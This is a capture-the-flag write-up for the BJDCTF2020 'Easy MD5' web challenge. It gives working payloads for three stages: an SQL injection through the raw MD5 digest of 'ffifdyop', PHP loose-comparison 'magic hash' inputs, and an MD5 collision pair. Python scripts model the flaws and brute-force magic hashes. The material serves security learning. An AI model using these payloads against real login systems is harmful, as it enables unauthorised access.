[BJDCTF2020]Easy MD5

Posted by 一只本本 on 2024-11-20

Challenge link: https://buuoj.cn/challenges#[BJDCTF2020]Easy MD5

After starting the environment, the page shows a single password input (the full page is reproduced in the response below).

The response is as follows.

HTTP/1.1 200 OK
Server: openresty
Date: Fri, 25 Oct 2024 15:20:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
hint: select * from 'admin' where password=md5($pass,true)
Cache-Control: no-cache
Content-Length: 3107

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        @media all and (min-width:600px) {
            * {
/* make width include border and padding */
                box-sizing: border-box;
            }

            body {
/* center the page content horizontally and vertically */
                position: relative;
                display: flex;
                height: 550px;
                align-items: center;
                justify-content: center;
                background-size: cover;
                background-repeat: no-repeat;
            }

            /*container*/
            .container {
                border: rgba(240, 235, 235, 0.932) solid 3px;
                box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
                background-color: white;
                width: 30%;
                height: 20%;
                border-radius: 8px;
                position: relative;
            }

            /*container end*/

            /*header*/
            #header h1 {
                position: relative;
                text-align: center;
            }

            /*header end*/
            /*main*/
            .main {
                align-items: center;
                justify-content: center;
                position: relative;
                width: 100%;
                height: 100%;
            }

            .main section {
                width: 50%;
                margin-left: 22%;
            }

            .main section .upload {
                width: 400px;
            }

            .main section .upload .in{
                margin-top: 10%;
                border-radius:10px;
                font-size: 17px;
                color: rgba(44, 44, 44, 0.582);
                font-family: "Microsoft YaHei";
                border: rgba(240, 235, 235, 0.932) solid 3px;
                box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
                background-color: white;
            }

            .main section .upload .give{
                margin-left: 10px;
                border-radius:10px;
                color: rgba(44, 44, 44, 0.582);
                font-size: 17px;
                font-family: "Microsoft YaHei";
                border: white solid 3px;
                background-color: white;
            }

            /*main end*/
        }
    </style>
</head>

<body>
    <div class="container">
        <div id="header">
        </div><!-- /header end -->
        <div class="main">

            <section>
                <form class="upload" action="leveldo4.php" method="GET">
                    <input type="text" id="name" name='password' class="in">
                    <input type="submit" class="give">
                </form>
            </section>
        </div><!-- /main end -->

    </div><!-- /container end -->
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
</body>

</html>

Notice that the response carries a custom HTTP header named "hint": select * from 'admin' where password=md5($pass,true). The password is therefore hashed server-side and the digest is concatenated into the query inside a single-quoted string literal.

When the second argument of PHP's md5() is true, the function returns the digest as 16 raw bytes rather than the usual 32-character hex string, so whatever bytes the hash happens to contain end up unescaped inside the SQL literal. The string "ffifdyop" is the classic input for this: its MD5 is 276f722736c95d99e921722cf9ed621c, whose first five bytes are 27 6f 72 27 36, i.e. 'or'6, followed by eleven mostly non-printable bytes (rendered in a Latin-1 console as 'or'6É]™é!r,ùíb). Spliced into the query, the WHERE clause becomes password='' or '6É]…': the first quote closes the empty password literal, or becomes an operator, and the second quote opens a new literal that starts with the digit 6. MySQL evaluates that literal in a boolean context by casting its leading numeric prefix to a number, 6, which is non-zero, so the condition holds for every row of admin and the login succeeds. This only works because the backend is MySQL-style about string-to-number casting and because the raw digest is concatenated without escaping.

Payload: ?password=ffifdyop
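The following is an added example, not code from the original write-up or the challenge. It reproduces what PHP's md5($pass, true) hands to the query described by the hint header (hashlib's .digest() returns the same 16 raw bytes), builds the resulting SQL text, and checks the property that makes "ffifdyop" work: the raw digest opens with a quote, or, a quote, and a non-zero digit. The query template and the candidate wordlist are constructed for illustration; the real server source is not shown on the page.

```python
import hashlib

# Added example, not part of the original write-up. The query template below
# is an assumption based on the hint header; the challenge source is not shown.

def md5_raw(password: str) -> bytes:
    """Equivalent of PHP md5($password, true): the 16 raw digest bytes."""
    return hashlib.md5(password.encode()).digest()


def build_query(password: str) -> bytes:
    """Assumed server-side query construction: raw digest concatenated
    into a single-quoted literal without escaping (as the hint implies)."""
    return b"select * from 'admin' where password='" + md5_raw(password) + b"'"


def injects_or_true(password: str) -> bool:
    """True if the raw digest starts with 'or' followed by a non-zero digit.

    The first quote closes the password literal, `or` becomes an operator,
    and the second quote opens a new literal beginning with a digit. MySQL
    casts that literal to a number from its leading numeric prefix, so
    '6...' becomes 6, which is truthy, and the WHERE clause passes.
    """
    raw = md5_raw(password)
    return raw.startswith(b"'or'") and raw[4] in b"123456789"


def find_injection_candidates(words):
    """Filter a wordlist for inputs whose raw MD5 injects `or <non-zero>`."""
    return [w for w in words if injects_or_true(w)]


if __name__ == "__main__":
    # Constructed candidate list; only ffifdyop is a known hit.
    candidates = ["admin", "password", "ffifdyop", "test123"]
    print(find_injection_candidates(candidates))   # ['ffifdyop']
    print(md5_raw("ffifdyop").hex())               # 276f722736c95d99e921722cf9ed621c
    print(build_query("ffifdyop"))
```

Finding a fresh string with this property by brute force is expensive (four fixed bytes plus one of nine digits), which is why the same handful of known inputs keeps appearing; the check above is the filter you would run over a large candidate set.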

The challenge then redirects to "levels91.php"; the response is as follows.

HTTP/1.1 200 OK
Server: openresty
Date: Fri, 25 Oct 2024 15:22:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
Cache-Control: no-cache
Content-Length: 780

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        span {
            position: relative;
            display: flex;
            width: 100%;
            height: 700px;
            align-items: center;
            font-size: 70px;
            font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            justify-content: center;
        }
    </style>
</head>

<body>
    <span>Do You Like MD5?</span>
</body>

</html>


The response body starts with an HTML comment that leaks part of the server-side check:

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

This stage relies on another PHP quirk, loose comparison. When both operands of == (or !=) are numeric strings, PHP compares them as numbers rather than byte by byte. A hex digest such as 0e830400451993494058024219903391 consists only of digits after the leading "0e", so PHP parses it as scientific notation, 0 × 10^830…, which is simply 0. Any two inputs whose MD5 hex digests both match "0e" followed exclusively by digits therefore satisfy md5($a) == md5($b), while $a != $b stays true because the inputs themselves are ordinary, non-numeric strings. (The comment's $GET['a'] reads as a typo for $_GET['a']; the payload below passes both values in the query string and is accepted.) This behaviour is present on the PHP 7.3.13 advertised in the X-Powered-By header and also on PHP 8: the PHP 8 change to comparisons only affects a number compared against a non-numeric string, and two numeric strings are still compared numerically.

// Some strings whose MD5 hex digest starts with "0e" followed only by digits

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

Payload:?a=QNKCDZO&b=s878926199a
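The block below is an added example, not part of the original write-up. It models the subset of PHP's == rule that the trick depends on (both operands numeric strings, so compared as numbers), confirms the two digests quoted above, and includes a brute-force searcher of the kind used to produce such strings in the first place. The numeric-string regex is a simplification of PHP's grammar written for this example; it covers the cases relevant to hex digests.

```python
import hashlib
import re

# Added example, not from the original write-up. Models the PHP == rule
# that the 0e trick relies on; the regex is a simplified PHP numeric-string
# grammar (sign, digits, optional fraction, optional exponent, leading
# whitespace tolerated). "0x1A" is NOT numeric in PHP 7+, and any trailing
# non-digit makes the whole string non-numeric.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_is_numeric_string(s: str) -> bool:
    return _NUMERIC.match(s) is not None


def php_loose_equal(a: str, b: str) -> bool:
    """Model of PHP `$a == $b` for two strings.

    Both numeric -> compared as numbers (so "0e123" == "0e456" is 0 == 0).
    Otherwise -> ordinary byte-wise comparison, the same as ===.
    Holds on PHP 7 and PHP 8: the PHP 8 change affects only number vs.
    non-numeric-string comparisons, not two numeric strings.
    """
    if php_is_numeric_string(a) and php_is_numeric_string(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """A hex digest PHP reads as zero: '0e' followed only by digits."""
    return re.fullmatch(r"0[eE]\d+", hexdigest) is not None


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def passes_loose_check(a: str, b: str) -> bool:
    """Model of `$a != $b && md5($a) == md5($b)` from the leaked comment."""
    return not php_loose_equal(a, b) and php_loose_equal(md5_hex(a), md5_hex(b))


def find_magic_md5(prefix: str, max_tries: int):
    """Brute-force search for an input whose MD5 hex digest is a magic hash.

    Per attempt the chance is about (1/256) * (10/16)^30, roughly 3e-9,
    so a hit takes a few hundred million tries on average; run this with a
    large budget offline, not in a quick test.
    """
    for i in range(max_tries):
        candidate = f"{prefix}{i}"
        if is_magic_hash(md5_hex(candidate)):
            return candidate
    return None


if __name__ == "__main__":
    print(md5_hex("QNKCDZO"))      # 0e830400451993494058024219903391
    print(md5_hex("s878926199a"))  # 0e545993274517709034328855841020
    print(passes_loose_check("QNKCDZO", "s878926199a"))  # True
```

The same model shows why a digest such as 0e12ab… does not work: the "ab" makes it non-numeric, so PHP falls back to a plain string comparison. When auditing code, the fix is === (or hash_equals()) rather than trying to filter inputs.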

After this payload is sent, the response points to the next page, "levell14.php", which displays its own source.

That stage compares the two MD5 digests with strict comparison (===), so the "0e" trick no longer helps: the two hex digests must be byte-for-byte identical while the inputs (param1 and param2) differ. That requires a genuine MD5 collision, two different byte strings with the same MD5. Known collision pairs contain non-printable bytes, including NUL, so they have to be sent percent-encoded through a tool that does not re-encode them (Burp, curl), not typed into the browser form. The pair below is one such published single-block collision: the two 64-byte messages differ in only two bytes.

Payload:param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
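As a final added example (not from the original write-up), the block below decodes the two percent-encoded parameters exactly as PHP would when populating its request arrays, shows where the messages differ, and evaluates the strict condition this stage enforces. The exact levell14.php source is not reproduced on this page, so the check is modelled from the description: the parameters must differ and their MD5 hex digests must be identical.

```python
import hashlib
from urllib.parse import unquote_to_bytes

# Added example, not from the original write-up. PARAM1/PARAM2 are the two
# percent-encoded values from the payload above; the check modelled here is
#   $param1 !== $param2 && md5($param1) === md5($param2)
# as described in the write-up (the page does not show the real source).

PARAM1 = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E"
          "%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60"
          "%FB_%07%FE%A2")
PARAM2 = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E"
          "%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60"
          "%FB_%07%FE%A2")


def decode_param(encoded: str) -> bytes:
    """Bytes PHP stores for the parameter after percent-decoding the body.
    (unquote_to_bytes leaves '+' alone; the payload contains none.)"""
    return unquote_to_bytes(encoded)


def strict_check(p1: bytes, p2: bytes) -> bool:
    """Model of `$p1 !== $p2 && md5($p1) === md5($p2)`."""
    return p1 != p2 and hashlib.md5(p1).hexdigest() == hashlib.md5(p2).hexdigest()


def diff_positions(a: bytes, b: bytes) -> list:
    """Byte offsets at which the two messages differ (equal length assumed)."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def analyse(encoded1: str, encoded2: str) -> dict:
    """Decode both parameters and summarise why the pair passes."""
    m1, m2 = decode_param(encoded1), decode_param(encoded2)
    return {
        "length": (len(m1), len(m2)),
        "diff_positions": diff_positions(m1, m2),
        "md5": (hashlib.md5(m1).hexdigest(), hashlib.md5(m2).hexdigest()),
        "passes": strict_check(m1, m2),
    }


if __name__ == "__main__":
    for key, value in analyse(PARAM1, PARAM2).items():
        print(key, value)
```

Each message is exactly 64 bytes, one MD5 block, and they differ at offsets 35 (0x00 versus 0x02) and 55 (0x55 versus 0xd5); everything else, including the NUL at offset 35 of the first message, must reach PHP intact, which is why the payload is sent percent-encoded rather than through the HTML form.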